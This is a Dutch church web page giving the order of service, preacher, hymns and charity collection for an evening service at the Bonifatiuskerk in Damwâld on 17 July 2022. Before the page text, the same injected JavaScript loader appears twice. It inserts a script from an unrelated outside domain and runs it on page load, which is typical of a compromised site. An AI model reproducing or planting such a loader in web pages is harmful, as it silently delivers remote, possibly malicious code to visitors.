;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 17 juli 2022 19:30 uur - PKN Damwâld
zondag 17 juli 2022
19:30 uur
Zomeravonddienst !

Kerkdienst zondag 17 juli 2022 19:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Mededeling:Zomeravonddienst !
Liturgie
Welkomstwoord en mededelingen
We zingen: Ps.100: 1,2 en 4
Stil gebed Votum en groet
We zingen: Gez. 513: 1, 2 en 4
Geloofsbelijdenis
We zingen: ELB 289: 1 en 2
Gebed
We lezen: Hand 8: 1 - 25
We zingen: Ps.145: 2 en 5
Preek .
We zingen: Gez. 672: 2 en 6
Dankgebed en voorbede
We zingen: Elb 215: 1,2 en 3
Zegen
Collecte
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Lichtpunt te Kollumerzwaag (collectenr. 22071)

Het Lichtpunt in Kollumerzwaag is een stichting die vanuit een christelijke levensovertuiging hulp biedt aan mensen die dat nodig hebben. Zonder subsidie van de overheid, gesteund door verschillende kerken, wordt deze hulp aangeboden door beroepskrachten en vele vrijwilligers. Het Lichtpunt heeft veel te bieden, namelijk opvang, begeleiding, dagbesteding in eigen kaarsenmakerij en ontmoeting.

Uitganscollecte: Bij de uitgang of via QR-code